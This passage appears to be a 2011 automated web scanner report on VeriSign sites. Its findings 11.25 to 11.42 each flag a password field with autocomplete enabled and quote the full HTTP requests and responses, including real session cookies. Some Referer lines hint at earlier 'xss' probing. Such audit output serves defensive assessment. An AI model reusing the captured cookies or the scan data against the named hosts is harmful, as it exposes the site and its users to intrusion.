Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The page contains a form with the following action URL:

https://ssl-certificate-center.verisign.com/process/retail/console_login.do

The form contains the following password field with autocomplete enabled:

enrollment.account.password

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.26. https://test-products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://test-products.verisign.com
Path:	/geocenter/reseller/logon.do

Issue detail

The page contains a form with the following action URL:

https://test-products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: test-products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.27. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The page contains a form with the following action URL:

https://trust-center.verisign.ch/process/retail/console_login.do

The form contains the following password field with autocomplete enabled:

enrollment.account.password

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.28. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The page contains a form with the following action URL:

https://trust-center.verisign.com/process/retail/console_login.do

The form contains the following password field with autocomplete enabled:

enrollment.account.password

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.29. http://www.verisign.ch/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

11.30. http://www.verisign.ch/contact-information/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/contact-information/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

11.31. http://www.verisign.ch/corporate/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/corporate/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

11.32. http://www.verisign.ch/trust-seal/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/trust-seal/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

11.33. http://www.verisign.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:24:37 GMT
Content-Type: text/html
Content-Length: 34615

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581

Response

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Content-Length: 77864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
   
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.35. http://www.verisign.com/code-signing/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/code-signing/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /partners/ssl-reseller-programs/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:13 GMT
Content-Type: text/html
Content-Length: 51846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
   
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:24 GMT
Content-Type: text/html
Content-Length: 34515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
   
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:19 GMT
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
   
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/ssl/buy-ssl-certificates/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /ssl/buy-ssl-certificates/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Type: text/html
Content-Length: 104571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" />

   
       <link href="ht
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.40. http://www.verisign.com/trust-seal/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/trust-seal/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

11.41. http://www.verisign.com/verisign-worldwide/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/verisign-worldwide/index.html

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

11.42. https://www.verisign.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
